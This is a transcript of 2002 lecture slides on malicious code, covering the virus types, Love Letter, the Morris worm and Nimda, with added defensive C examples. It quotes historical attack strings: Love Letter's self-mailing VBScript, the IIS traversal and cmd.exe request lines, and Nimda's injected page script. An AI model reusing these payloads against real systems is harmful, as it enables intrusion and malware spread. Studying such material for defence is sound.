2/13/02 Chapter 13 Malicious Code.


Transcript of 2/13/02 Chapter 13 Malicious Code.

Page 1:

Chapter 13: Malicious Code

A class of unwanted software, often called “Malware”.

3 major arrival scenarios:

- Arrives with the help of the user (opens a contaminated file).
- Arrives on its own (a vulnerability or “feature” allows execution).
- Is left behind after an adversary breaks in.

User assistance may be:

- Unwitting – user didn’t have a clue.
- Witting – user knew better, but did it anyway.
- Half-witting – user knew better, but took a chance.

Page 2:

Malicious Code – Impact

May be benign or destructive. Why? Because malware typically contains an executable and can do anything an executable can do.

Even if benign, consumes resources (runs, replicates, occupies storage, consumes cpu cycles, slows the system down).

Takes time & effort to remove.

Example is happy.exe, which presented a pretty happy new year graphic message for 1999.

Can’t really be sure they are benign - often don’t know.

If destructive, is clearly a much more serious menace.

Page 3:

Malicious Code – The Threat is Growing

Year    New OS Vulnerabilities    Known Viruses
1998    262                       40,000
1999    417                       48,000
2000    1,090                     55,000
2001    2,437                     59,000

While known viruses grow rather linearly, new OS vulnerabilities are more than doubling every year!

Source: Computerworld, April 1, 2002, page 46.

Page 4:

Malicious Code – Why is the threat growing?

Increased # of products (e.g., wireless, PDA’s, new OS versions).

Better delivery methods – web expansion in the middle to late 90s.

Experience of malware developers – from an infant industry to highly experienced in the past decade.

Commitment of nation states to information warfare. Do we really know who is launching the attacks & developing codes?

Fast spreading time to reach # 1 in infected systems – Form virus (2-3 years), Concept macro virus (2-3 months), NIMDA (22 minutes).

Page 5:

Malicious Code - Taxonomy

Malicious Software (Malware)
  Requires Host Program: Logic Bombs, Trojan Horses, Viruses
  Does Not Require Host Program: Worms, Bacteria

  Do Not Replicate: Logic Bombs, Trojan Horses
  Do Replicate: Viruses, Worms, Bacteria

All very nice, but now we have blended threats and other newcomers!

Page 6:

Malicious Code – A New Category

Hostile Java applets – code snippets that are executed by Java to perform some function, often embedded in a web page.

May belong on the “requires a host program” list. The host in this case is your browser with Java enabled. The applet is introduced to your system when you visit a web page containing the applet.

Two types – “malicious” and “attack” applets.

Malicious are in the wild and for the most part are annoying, but can be serious – can result in denial of service and invasion of privacy.

Attack applets are not yet in the wild, but have been extensively tested in lab settings. They attempt to compromise the Java security model and break through to your system.

Page 7:

Entrance Paths

Logic Bombs, Trojans, Viruses

1. Integral to or attached to an executable program, including macros that are enabled to be executed when a file is opened.
2. Transported by media (e.g., floppy, tape, CD-ROM) OR arrive over the network as attached or directly executable programs.

Worms, Bacteria

1. Do not require a host program for transport.
2. Arrive directly from the network – capable of self-propagation.

Applets

1. Are part of a web page you visit.
2. If Java is enabled, the applet will execute and do its thing.

Page 8:

Virus Behavior

Aptly named - behave like biological viruses.

1. Typically small programs.
2. Are attached, or attach themselves, to executable files (e.g., a program, a script, or a command string).
3. Activate when the host program is executed.
4. May be benign or malignant (i.e., destructive).
5. Capable of doing anything a program can do.
6. Generally cannot infect a system from a non-executable file.
7. Do not cause physical damage.
8. Can also infect firmware (e.g., flash ROM in modems, BIOS).
9. Typically activate on an event (e.g., when executed, on a date, after n re-boots, at some random time).
10. Often replicate and attempt to infect other files (e.g., Melissa).

Page 9:

Indications of a Virus

1. Computer runs slow.
2. System runs out of free space.
3. File sizes change.
4. Unexplained files appear on the hard drive.
5. Unexplained behavior:

- CD-ROM drawer opens and closes on its own (a joke virus).
- Programs won’t execute.
- Files won’t open.
- Characters missing from displays.
- Obscene language appears on the display.

And almost any other strange behavior you can imagine.

Page 10:

Flash Memory Viruses

Flash memory - writeable firmware. Found in:

PC BIOS, modems, video cards, printers, routers, etc.

Increasing use - allows changes to a hardware device after manufacture.

Example uses of flash memory:

1. 56k modem - two pre-standard designs - sold with flash memory - when the V.90 standard was issued, a downloadable upgrade.
2. Routers - downloadable protocol changes, support for new protocols.
3. Other devices – bug fixes, performance updates.

Page 11:

Virus Types

Companion - uses the execution hierarchy (order) of the system.

Parasitic - attaches to a host program and executes when host program executes.

OS Structure - attaches to OS components (e.g., boot blocks).

Macro - infect macro languages (e.g., Word, Excel).

Polymorphic - mutate with each infection.

Stealth - attempt to hide from detection.

Jokes & Hoaxes - Do nothing but excite some users.

Page 12:

Companion Viruses

Rely on the execution order of a system (e.g., in Windows the order is .COM, .EXE, and .BAT).

User specifies execute WP meaning WP.EXE. The OS will search for WP.COM, then WP.EXE.

If a virus exists called WP.COM - it will execute first and often attach itself to WP.EXE.

Using common names has been an often-used technique to trick users into unwittingly executing a virus program.
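As an added example (not from the slides), the .COM/.EXE/.BAT search order above written as a small C resolver, with an audit check that reports base names shadowed by a same-named .COM, which is the situation a companion virus creates; the directory listing is constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Search order the slide describes: for a bare command name the shell tries these
   extensions in turn and runs the first file that exists. */
static const char *const EXT_ORDER[] = { ".COM", ".EXE", ".BAT" };
#define EXT_COUNT (sizeof EXT_ORDER / sizeof *EXT_ORDER)

/* DOS file names are case-insensitive, so compare ignoring case. */
static int name_eq(const char *a, const char *b)
{
    while (*a != '\0' && *b != '\0') {
        if (toupper((unsigned char)*a) != toupper((unsigned char)*b))
            return 0;
        a++;
        b++;
    }
    return *a == '\0' && *b == '\0';
}

/* Which entry in `listing` runs when the user types `cmd` with no extension?
   Returns its index, or -1 when nothing matches. */
int resolve_command(const char *cmd, const char *const *listing, size_t count)
{
    char candidate[64];
    for (size_t e = 0; e < EXT_COUNT; e++) {
        snprintf(candidate, sizeof candidate, "%s%s", cmd, EXT_ORDER[e]);
        for (size_t i = 0; i < count; i++)
            if (name_eq(listing[i], candidate))
                return (int)i;
    }
    return -1;
}

/* Audit check: count base names that have both a .COM and an .EXE in the same
   directory. The first such base name is copied to `first` (when non-NULL) so a
   report can name it. */
int count_companion_pairs(const char *const *listing, size_t count, char *first, size_t first_size)
{
    int pairs = 0;
    if (first && first_size) first[0] = '\0';
    for (size_t i = 0; i < count; i++) {
        size_t len = strlen(listing[i]);
        if (len < 5 || !name_eq(listing[i] + len - 4, ".EXE"))
            continue;
        char com[64];
        snprintf(com, sizeof com, "%.*s.COM", (int)(len - 4), listing[i]);
        for (size_t j = 0; j < count; j++) {
            if (j != i && name_eq(listing[j], com)) {
                if (pairs == 0 && first && first_size)
                    snprintf(first, first_size, "%.*s", (int)(len - 4), listing[i]);
                pairs++;
                break;
            }
        }
    }
    return pairs;
}

/* Constructed directory listing for the demo: WP.COM shadows the legitimate WP.EXE. */
static const char *const DEMO_DIR[] = { "WP.EXE", "WP.COM", "EDIT.COM", "FORMAT.EXE", "AUTOEXEC.BAT" };
#define DEMO_DIR_COUNT (sizeof DEMO_DIR / sizeof *DEMO_DIR)

/* Convenience for the demo: base name of the first shadowed pair in DEMO_DIR. */
const char *demo_first_companion(void)
{
    static char first[16];
    count_companion_pairs(DEMO_DIR, DEMO_DIR_COUNT, first, sizeof first);
    return first;
}

int main(void)
{
    int idx = resolve_command("WP", DEMO_DIR, DEMO_DIR_COUNT);
    printf("typing WP runs: %s\n", idx >= 0 ? DEMO_DIR[idx] : "(nothing)");
    printf("companion pairs: %d (first: %s)\n",
           count_companion_pairs(DEMO_DIR, DEMO_DIR_COUNT, NULL, 0), demo_first_companion());
    return 0;
}
```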

Page 13:

Typical Method of Infection

Scenario: shows a program before and after virus infection, with a programmed target of certain .EXE and .COM files.

[Figure: .EXE and .COM files before and after infection. Each file is drawn with its header (Hdr), instruction pointer (IP) and entry JUMP, and a program body running from START to END. After infection, a Virus block and a Jump are appended to each file.]

Page 14:

Virus Wars - A Typical Scenario - .EXE File

[Figure: layout of an .EXE file: the file header (MZ, CS, IP, Size), then the program load image from START to END, then overlay data.]

MZ Signature = Executable File

CS & IP are pointers to the start of the program image

Size specifies the image size

Program load image

Overlay data (e.g., buffer space)

File header

Virus must change the size of the image. Respond by storing the size somewhere else. Then the virus writer compresses the infected image to be the same size as before. Respond by using a digital signature…….

On and on it goes!

Page 15:

Parasitic Viruses

Enter a system already attached to what appears to be a legitimate executable file.

In the preceding example, a parasitic virus would enter a system already attached to, for example, a .COM or .EXE file as shown in the "after infection" case.

Once run, the virus code could seek out other existing files with the same .COM or .EXE extensions and infect them.

Page 16:

Operating System Structure Viruses

Attach themselves to executable parts of the OS structure and/or insert themselves in unused OS structures. These are prime targets since they execute when the system boots. For example:

Master Boot Record (MBR & partition table)
Unused sectors at the beginning of the disk
Boot record
File Allocation Table (FAT)
Directory record
Bad sectors
Unused tracks at the end of the disk

In Microsoft Windows – modify the registry so the virus executes at startup.

Page 17:

Typical Bootstrap Process

Execute H/W boot → Read S/W boot to RAM → Transfer control to RAM → Find & load operating sys. → Transfer control to OS

On power-up, BIOS ROM holds a program to test basic h/w and identify the boot device (e.g., floppy, hard drive).

The BIOS program completes its checks and executes a set of simple load-to-memory instructions to load a more robust loader (e.g., the initial loader) into primary memory.

Once the initial loader is resident, control is transferred to the starting location of the initial loader.

The initial loader identifies the location of the operating system and loads the resident parts of the OS to memory.

When loading completes, control is transferred to the operating system (e.g., the null CLI prompt appears).

The process includes a number of validation tests including simple signatures (not cryptographic), such as a 2-byte checksum.

Page 18:

Typical Bootstrap Process - Infected Boot Record

Execute H/W boot → Read S/W boot to RAM → Transfer control to RAM → Virus loads → Find & load operating sys. → Transfer control to OS

In an infected system, the initial loader is replaced with an infected loader.

The BIOS program completes its checks and loads the infected loader into primary memory.

Once the infected loader is resident, control is transferred to the starting location of the virus.

The virus loads first, makes the changes it was designed for (e.g., may erase its tracks, infect the hard drive, etc.) and then transfers control to the original loader.

The OS then loads normally and control is transferred to the operating system (e.g., the null CLI prompt appears).

At this point the virus is resident and executable - it will execute and act according to its design.

Page 19:

A Specific Infection - The Michelangelo Virus

1. Infected diskette is placed in the A: drive and booted.
2. Diskette boot program loads the virus into main memory.
3. Infects the hard drive by moving the hard drive's original boot block to another location on the disk and installing itself in the boot block.

Every time a disk is mounted on the system, that disk is infected as well.

Part of the virus program reads the system date. On March 6, the virus activates and overwrites:

- Any mounted diskette with random characters, and
- hard disk sectors 1-17, heads 0-3, and tracks 0-255 (with random characters).

Page 20:

LOVE LETTER VIRUS – WORM?

May 4, 2000 “Love Letter” is released from the Philippines. Uses the Microsoft VBS scripting language (requires Windows Scripting Host be installed before it could run). Check My Computer, View, Options, File Types & look for VBScript.

Infects Microsoft Windows machines if the scripting host is enabled.

Infection is by e-mail, but can also be via shared files, USENET news, and Internet Relay Chat.

E-mail – Outlook users get a message with subject line “ILOVE YOU” and a body that reads “kindly check the attached LOVELETTER coming from me”. It has an attachment named:

LOVE-LETTER-FOR-YOU.TXT.VBS

Usually, the return address will be a person known to the victim.

Page 21:

LOVE LETTER VIRUS – What it does or tries to do

• Replaces certain files with a copy of itself.
• Sends itself to other potential victims found in the previous victim’s Outlook address book.
• Modifies Explorer’s home page URL.
• Modifies several registry keys.
• Makes an Internet Relay Chat script.

• Sniffs passwords and attempts to mail them to an Internet site.

Page 22:

LOVE LETTER VIRUS – Program Structure

Main
  regruns
  html
  spreadtoemail
  listadriv

Page 23:

LOVE LETTER VIRUS – File Replacement - listadriv

Main copies virus to multiple locations and calls the subroutines.

Searches all drives for files with certain extensions and takes the following file-dependent actions:

• If file is vbs or vbe (Visual Basic), replace the file with a copy of itself.
• If file is js, jse, css, wsh, sct, or hta, replace the file with itself and change the extension to vbs.
• If file is jpg or jpeg, replace the file with itself and append a vbs extension (abc.jpeg becomes abc.jpeg.vbs).
• If file is mp3 or mp2, replace the file with itself and append a vbs extension (abc.mp3 becomes abc.mp3.vbs) and mark as hidden.

Page 24:

LOVE LETTER – send e-mail - spreadtoemail

Generates e-mail with sender = current victim and sends itself to every entry in the local Outlook mailbox. Also tries to read the Exchange server’s mail directory and send itself to every address found there.

Set out = Wscript.CreateObject(“Outlook application”)
Set mail = out.Createitem(0)
Set mailaddress = %script to get user from address book%
Mail.Recipients.add(mailaddress)
Mail.Subject = “I LOVE YOU”
Mail.body = vbcrlf & ”kindly check the attached LOVELETTER coming from me.”
Mail.Attachments.Add(dirsystem & ”\LOVE-LETTER-FOR-YOU.TXT.vbs”)
Mail.send

Page 25:

LOVE LETTER VIRUS – Home page - html

If the file <DIRSYSTEM>\WinFAT32.exe does not exist, the worm:

• Sets the Explorer home page to one of four randomly selected pages. These URLs all refer to locations that contain a file WIN-BUGSFIX.exe.
• WIN-BUGSFIX.exe contains code for cracking passwords on the victim’s machine and mailing them to an ISP in the Philippines.
• The worm also looks for this code in the Explorer download directory and, when it is found, it is added to the victim’s list of programs that run at startup.
• Finally, the Explorer start page is set to “about:blank”.

Page 26:

LOVE LETTER VIRUS – Registry changes -regruns

Creates registry entries:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Mskernel32, dirsystem&”\MSKernel32.vbs”
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Services\Win32DLL
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
HKLU\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKLU\Software\Microsoft\Internet Explorer\Main\Start Page
HKLU\Software\Microsoft\WAB\*

This virus was widespread – worldwide within a few hours.

Would have done more damage, except scripting was not enabled on many systems.

Damage was mainly the cost of eradication.

Page 27:

Macro Viruses

Very popular virus family that relies on the use of executable macro languages that can be embedded in documents - often to create formatting for templates, etc.

For example, in Microsoft Word, any time a template file is opened, it is scanned for macros. If it contains an AutoOpen macro, the macro instructions are immediately executed.

If the AutoOpen macro is infected, the user only has to open the file for the virus to run. One of the things these viruses often do is update the global macro pool so other documents that use the macro pool will also be infected.

Page 28:

Polymorphic Viruses - Multiple Versions

Conventional methods of virus eradication rely on detecting the unique signature of a virus. In order to make this more difficult, virus developers often build viruses that contain self-modifying code.

Structures for these viruses include:

The original virus
A program that encodes the original code
A decoder to recover the original virus
A mutation engine that changes the decoding routine (adding code like LOOPS or NO OPERATION instructions)

These change the external signature of the code but do not change the decoded result. Consequently, they mask the virus from detection.

Page 29:

Stealth Viruses

Infect a program and then attempt to hide from detection by active measures. Two types - size stealth and read stealth:

Size stealth attempts to 1) measure the length of the good file, 2) infect it, and 3) compress the infected file back to the length of the original.

Read stealth inserts the virus code between the OS and all calls to read files (e.g., by a virus scanner). On read, the virus intercepts the call and returns an un-infected file. The Stoned Monkey Master Boot Record virus is a read stealth virus.

These methods require the virus to be memory resident so they can intercept system I/O calls. Booting from a known clean floppy and scanning will find these infections (if they are known).

Page 30:

Stealth Virus - Hiding Places

Page 31:

Bacteria

Do not require host programs, but replicate and spread.

In 1987, the IBM Christmas Bacteria was launched in BitNet, a WAN for university e-mail.

It arrived as an e-mail attachment. When opened, it rendered a Christmas tree on the screen, replicated itself, and sent a copy of itself to every mailbox on the user’s local mail distribution list. It spread so rapidly that BitNet had to be shut down for several days.

Sound familiar? Like perhaps, Melissa?

Melissa was uniformly labeled a virus - since it used an e-mail message as the host - not clear if there are any real bacteria.

Page 32:

Worms

No requirement for a host program - independently travels over the network, finding, infecting, replicating, and moving on.
No requirement for a user to take any action - infection happens!

These capabilities are also considered useful tools for:

Propagating useful network information (e.g., configuration files).
Remote software distribution & installation (e.g., automatic downloads).

There are some requirements:

1. An initial system to act as the launch platform.
2. Access to a network (typically via e-mail or IP address).
3. Network services enabled (e.g., mail).

Page 33:

Worm - Methods

Searches for other network systems known to the original host computer (e.g., by e-mail or IP address). On ID, establishes a communications link to the remote system. Attempts to exploit a software weakness. On success, downloads a copy of the worm from the attacking system. The process is repeated for every successful intrusion. Spreads rapidly and can easily monopolize the system and network.

The best known worm: the "Internet worm" – Robert Morris. Attacked Unix BSD systems (e.g., Sun 3 & VAX running BSD). Launched on 11/2/88 - 6000 systems.

Three-pronged attack: “Remote Shell”, “Sendmail”, “fingerd”.

Page 34:

Remote Shell Attack

Remote shell allows a user to run a shell from a remote location. Attack # 1: try to spawn a remote shell (rsh) process; try

/usr/ucb/rsh, or
/usr/bin/rsh, or
/bin/rsh

If rsh enabled, establish a TCP/IP connection back to the attacking machine, and download the worm so it could be compiled, linked and executed. When done disconnect.

Page 35:

Sendmail Attack

Sendmail is a Unix mailer designed to route mail in a network environment using a mailer daemon (background process).

When enabled, the mailer listens on TCP Port #25 for attempts to deliver mail by Simple Mail Transfer Protocol (SMTP).

On a successful TCP connection attempt, the daemon makes the connection and gets:

Sender
Recipient
Delivery instructions, and
Message contents

Trouble was, there was a debug option in the Sendmail program that was not turned off.

Page 36:

Sendmail Attack

The worm issued a DEBUG command to the remote system, and a command string instead of the user address.

Such commands are not allowed in normal mode, but are OK in debug mode so testers can determine mail is arriving at remote locations without actually sending mail or remotely logging in.

With debug turned on, sendmail was easy to configure for further testing; however, this also allowed the same actions as for rsh.

This means a remote user had user privileges on the system.

Page 37:

Fingerd Attack

Fingerd is a utility that allows a user to get information about other network users. It is used to get the full name or login name of a user and whether they are logged in, their telephone number, etc.

It is a daemon running in the background to respond to requests. It accepts remote connections, reads a single line, and returns the requested information.

The exploit overran the fingerd buffer by sending a special 536-byte string to fingerd, causing the stack to be overwritten such that the return address was corrupted and returned to a remote shell program that proceeded to establish the TCP/IP connection as before.

Page 38:

Sidebar – Buffer Overflow Attacks

Manipulates the input buffer to allow the attacker to execute arbitrary commands on the target machine.

Result of the poor programming practice of not writing code that checks the bounds on an input data string supplied to a program.

When receiving input, a program calls the input routine and passes arguments specifying the location of buffers for the input data. The call passes the arguments and the return address to the input routine and transfers control to the input routine.

The input routine pushes the arguments and the return pointer on the stack, then pushes the input data stream on the stack. When complete, the input routine returns control to the calling program specified in the return address.

Page 39:

Stack – LIFO Architecture

Stack layout, from low memory to high memory:

  Input variable 2
  Input variable 1
  Return Pointer
  Call Arguments

Last-In, First-Out (LIFO): items are pushed on the stack in order and popped off the stack in reverse order.

Page 40:

Corrupting the Stack

Corrupted stack, from low memory to high memory:

  Input variable 2
  Executable code (e.g., a shell command)
  New pointer to executable code
  Call Arguments

When return is executed, the shell is run – the attacker then connects to the shell.
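The pattern behind the sidebar, an unbounded copy into a fixed stack buffer, beside the bounded version that rejects an over-long line, written as an added C example; this is not the fingerd source. The 512-byte buffer size is an assumption; the 536-byte request length is the figure the slides quote.

```c
#include <stdio.h>
#include <string.h>

/* Assumed sizes for the illustration (not from the fingerd source): a 512-byte line
   buffer, and the 536-byte request length the slides quote. */
#define LINE_BUF 512
#define OVERLONG_REQUEST 536

/* The vulnerable pattern: copy until end of line with no idea how big dst is. When dst
   is a stack buffer, bytes beyond its end land on the saved return pointer, which is the
   corruption the stack diagram shows. Kept here for contrast and only ever called with
   input shorter than its destination. */
static void copy_line_unbounded(char *dst, const char *src)
{
    while (*src != '\0' && *src != '\n')
        *dst++ = *src++;
    *dst = '\0';
}

/* The bounded version: the caller passes the buffer size, and a line that does not fit
   (terminator included) is rejected outright so nothing is written. Returns the number
   of bytes copied, or -1 when rejected. */
long copy_line_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n = strcspn(src, "\n");
    if (dst_size == 0 || n >= dst_size)
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (long)n;
}

/* A finger-style request handler built on the bounded copy. Returns the number of bytes
   accepted, or -1 when the request line was too long for the stack buffer. */
long handle_request(const char *request)
{
    char line[LINE_BUF];              /* fixed-size buffer on the stack, as in the sidebar */
    long n = copy_line_bounded(line, sizeof line, request);
    if (n < 0)
        return -1;                    /* over-long request dropped; the stack is untouched */
    /* look up the user named in `line` ... (omitted) */
    return n;
}

/* Builds a constructed request of `len` filler bytes and returns handle_request's verdict. */
long handle_request_of_length(size_t len)
{
    static char req[1024];
    if (len + 1 >= sizeof req)
        return -1;
    memset(req, 'A', len);
    req[len] = '\n';
    req[len + 1] = '\0';
    return handle_request(req);
}

int main(void)
{
    char scratch[64];
    copy_line_unbounded(scratch, "alice\n");   /* safe only because the input is short */
    printf("unbounded copy of a short line: %s\n", scratch);
    printf("bounded handler, short request:    %ld\n", handle_request("alice\n"));
    printf("bounded handler, %d-byte request: %ld\n", OVERLONG_REQUEST,
           handle_request_of_length(OVERLONG_REQUEST));
    return 0;
}
```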

Page 41:

Worm Code - Main

Main collected information on other computers known to this one by reading public configuration files. It also ran system utilities. This information formed the database for further attacks.

In each successful case the worm attempted to hide its existence by unlinking its binary, killing its parent process, encrypting and reading its files into memory, and deleting files created during entry.

Periodically it forked itself and killed its parent so it had a continuously changing process ID to help avoid detection. Every 12 hours it erased its own records of hosts it had infected so they became eligible for infection again.

Page 42:

Worm Code - Main

It also reads and cracks local password files. Password cracker:

UNIX passwords are stored in a public file, but encrypted with a DES variant. The algorithm is non-invertible.

However, Unix allowed the encryption of password lists and comparison to the password file without calling an OS function (i.e., no log interception).

Didn’t do anything exotic - just tried lists of common words until it found an encrypted MATCH - no encryption breakage. Some sites reported 50% of passwords were compromised.

This gave the worm access to additional accounts and more possible destinations for mail and IP.

Page 43:

Worm - Impact

Eventually contaminated over 6000 Unix systems.

First fix was available within 12 hours of discovery. By 28 hours a method to stop propagation was posted.

Trouble was, there was no structured response - all was “ad hoc” andthrough the informal network of colleagues.

Resulted in establishment of DARPA funded CERT "Computer Emergency Response Team" at Carnegie Mellon University.

Later DOE created CIAC - Computer Incident Advisory Capabilityat Lawrence Livermore National Laboratory.

Page 44:

Anti-Virus Web Sites

http://www.cert.org
http://www.symantec.com
http://www.antivirus.com
http://www.nai.com
http://www.icsa.com
http://www.sans.org
http://www.fprot.com
http://www.datafellows.com
http://www.ciac.org
http://www.wildlist.org

Page 45:

Fast Forward – Sophistication – Nimda

Appeared September 18, 2001.

Affected Windows 95/98, ME, NT4, 2000 – clever version code.

Combination virus/worm – it is not clear the distinction is useful any more.

Serious impact to infected systems.

Side effect created large volumes of Internet traffic at web servers known to the Internet.

Few sites escaped from Nimda.

Page 46:

Nimda Propagation & Infection – 4 modes

1. Modifies .exe files on the victim so they include the worm.

2. Sends e-mail containing the worm to all addresses found in the in-box and address book of the victim.

3. Searches for vulnerable IIS servers, compromises the server and downloads the worm. The worm infects web pages so other systems browsing the server will also be infected.

4. Searches the Local Area Network for shared files on servers or workstations and puts a hidden copy of the worm on file shares. Opening documents in these directories causes the worm to be executed.

Page 47:

e-Mail Compromise

Impacts Outlook and Outlook Express.

An e-mail arrives with an attachment named “readme.exe”.

On older un-patched systems, the attachment is automatically executed when the e-mail is opened and readme.exe, the worm, is executed.

On patched or un-patched systems, readme will execute if double-clicked.

The worm then harvests e-mail addresses from the in-box and address book of the infected system.

Page 48:

IIS (Microsoft Web Server) Compromise

Infected systems form IP addresses (some targeted, some random) and attempt to compromise IIS servers with 4 different attacks:

1. Two scripts to exploit the root.exe back-door left by prior Code Red II or Sadmind infections. If successful, gives root privilege to the worm.

"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 201 "-" "-"

2. Two more for Code Red II backdoors where the C: and D: drives were mapped to IIS virtual folders allowing access to cmd.exe (the Windows command-line interpreter, with administrator privilege).

"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"

Page 49:

IIS (Microsoft Web Server) Compromise

3. Two scripts to exploit the IIS/PWS Escaped Character Decoding Command Execution vulnerability:

GET /scripts/..%255c../winnt/system32/cmd.exe?/……..
GET /_vti_bin/..%255../..%255../winnt/system32/cmd.exe?/…..

If un-patched, causes the server to decode the requested pathname twice. On decode 1, security is checked. If security is OK, the second decode is not checked again.

The path after the first decode is legal and passes security, but the path after the second decode is not, and it allows the execution of cmd.exe, the Windows command line interpreter, with administrator privilege.

A patch has been available for some time from Microsoft.

Page 50:

IIS (Microsoft Web Server) Compromise

4. 8 scripts to exploit the IIS/PWS Extended Unicode Directory Traversal vulnerability (only 2 are shown below):

GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/……..
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/…..

If un-patched, IIS does not validate the input correctly and allows inappropriate directory access when the / and \ characters are encoded with their Unicode equivalents. In the examples:

%c1%1c is / and %c0%2f is \ in the Chinese Unicode character set.

Note: Unicode is the extended character encoding standard used to represent letters and symbols from all the languages in the world.

Page 51:

IIS (Microsoft Web Server) Compromise – Summary

1. Exploit root.exe or cmd.exe backdoors left by Code Red II.
2. Exploit the IIS Directory Traversal vulnerability allowing files to be accessed if they reside on the same drive as the server web folders.
3. Exploit the IIS Escaped Character Decoding Command Execution vulnerability that allows files to be accessed and executed.

If successful, the worm uses the Trivial File Transfer Protocol (tftp) to connect back to the system originating the attack to download and execute Admin.dll, the main body of the worm.
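An added C example (not from the slides and not IIS code) that classifies access-log lines like those quoted on pages 48 to 50: it percent-decodes until nothing changes, folds backslashes and the quoted byte pairs into '/', and flags traversal above the web root, invalid encoding, and requests for root.exe or cmd.exe. With decode_rounds set to 1 it reproduces the check-after-one-decode mistake behind the Escaped Character Decoding vulnerability, so the %255c line passes the traversal check; the log line in main() is constructed.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define PATH_MAX_LEN 512
/* Verdict bits returned by classify_request(); 0 means clean. */
#define V_BACKDOOR     1   /* as for root.exe or cmd.exe (Code Red II leftovers / command shell) */
#define V_TRAVERSAL    2   /* path climbs above the web root once fully decoded */
#define V_BAD_ENCODING 4   /* bytes >= 0x80 survive decoding: overlong / invalid UTF-8 escapes */

static int hexval(int c)
{
    c = tolower(c);
    return (c >= '0' && c <= '9') ? c - '0' : (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* One pass of %XX decoding; returns how many escapes were decoded. */
static int percent_decode_once(const char *in, char *out, size_t n)
{
    size_t o = 0;
    int decoded = 0;
    for (size_t i = 0; in[i] != '\0' && o + 1 < n; i++) {
        int hi = (in[i] == '%') ? hexval((unsigned char)in[i + 1]) : -1;
        int lo = (hi >= 0) ? hexval((unsigned char)in[i + 2]) : -1;
        if (lo >= 0) { out[o++] = (char)(hi * 16 + lo); i += 2; decoded++; }
        else out[o++] = in[i];
    }
    out[o] = '\0';
    return decoded;
}

/* Decode until nothing changes, so "%255c" ends as "\" rather than "%5c"; rounds == 1 is the unpatched check. */
static void percent_decode(const char *in, char *out, size_t n, int rounds)
{
    char tmp[PATH_MAX_LEN];
    snprintf(out, n, "%s", in);
    for (int r = 0; r < rounds && percent_decode_once(out, tmp, sizeof tmp) > 0; r++)
        snprintf(out, n, "%s", tmp);
}

/* Make every separator '/': backslash, plus the byte pairs quoted on the slides (%c0%2f, %c1%1c)
   and their %c0%af / %c1%9c variants. Lower-cases the path and reports any byte >= 0x80. */
static int normalise(char *p)
{
    int flags = 0;
    size_t o = 0;
    for (size_t i = 0; p[i] != '\0'; i++) {
        unsigned char c = (unsigned char)p[i], d = (unsigned char)p[i + 1];
        if ((c == 0xC0 && (d == 0x2F || d == 0xAF)) || (c == 0xC1 && (d == 0x1C || d == 0x9C))) {
            p[o++] = '/';
            i++;                               /* both bytes consumed */
            flags |= V_BAD_ENCODING;
        } else {
            if (c >= 0x80) flags |= V_BAD_ENCODING;
            p[o++] = (c == '\\') ? '/' : (char)tolower(c);
        }
    }
    p[o] = '\0';
    return flags;
}

/* Walk the segments; a ".." that pops below the root means the request leaves the web tree. */
static int climbs_above_root(const char *p)
{
    int depth = 0;
    while (*p != '\0') {
        while (*p == '/') p++;
        if (*p == '\0') break;
        const char *e = strchr(p, '/');
        size_t len = e ? (size_t)(e - p) : strlen(p);
        if (len == 2 && p[0] == '.' && p[1] == '.') { if (--depth < 0) return 1; }
        else if (!(len == 1 && p[0] == '.')) depth++;
        p += len;
    }
    return 0;
}

/* Classify one access-log line. The path runs from the first '/' up to the query string or
   a space. decode_rounds = 1 mimics the unpatched single decode; 4 reaches a fixed point. */
int classify_request(const char *logline, int decode_rounds)
{
    char path[PATH_MAX_LEN], dec[PATH_MAX_LEN];
    const char *s = strchr(logline, '/');
    size_t o = 0;
    while (s && *s != '\0' && *s != ' ' && *s != '?' && o + 1 < sizeof path) path[o++] = *s++;
    path[o] = '\0';
    percent_decode(path, dec, sizeof dec, decode_rounds);
    int flags = normalise(dec);
    if (climbs_above_root(dec)) flags |= V_TRAVERSAL;
    if (strstr(dec, "root.exe") || strstr(dec, "cmd.exe")) flags |= V_BACKDOOR;
    return flags;
}

int main(void)
{
    /* Constructed log line; the request path is the one quoted on page 49. */
    const char *line = "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0";
    printf("after one decode: verdict %d; after full decode: verdict %d\n",
           classify_request(line, 1), classify_request(line, 4));
    return 0;
}
```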

END OF MALWARE CHAPTER

Page 52:

Web Browser Compromise

Users browsing the web may encounter an IIS server that has been compromised by the worm. One of the changes the worm makes is to search an infected IIS server for HTM, HTML, and ASP files and append a JavaScript to each file it finds.

The script attempts to download a readme.eml file to the browser. If the browser is a vulnerable version of Internet Explorer, the eml file executes and infects the user’s system. The code is:

<html><script language="javascript">window.open("readme.eml", null, "resizable=no, top=6000, left=6000")</script></html>

Page 53:

Modifications to the Victim after infection

Searches for executable files on hard drive, inserts itself into the executable and runs whenever the executable runs. Includes:

All files in the registry application path.
SYSTEM.INI, so it runs every time the system boots.
All folders containing .DOC files, so it runs when Word or WordPad runs.
All folders containing HTM, HTML, or ASP files, so it runs when a browser opens one of these files.

On NT/2000 systems adds an account named guest to the local administrators group, gives it a blank password, and turns the account “on”.

On 9x/ME systems, configures all local drives as shared for user “guest”.

Page 54: 2/13/02 Chapter 13 Malicious Code.


NIMDA Prevention

Apply Microsoft patches to IIS Servers.

Check for Code Red II backdoors from earlier infection.

Patch Internet Explorer to eliminate automatic execution of embedded MIME types.

Disable JavaScript.

Don’t execute attached e-mail files.

Page 55: 2/13/02 Chapter 13 Malicious Code.


Trojan Horses

Based on the well-known story by Virgil in Aeneid, Book II.

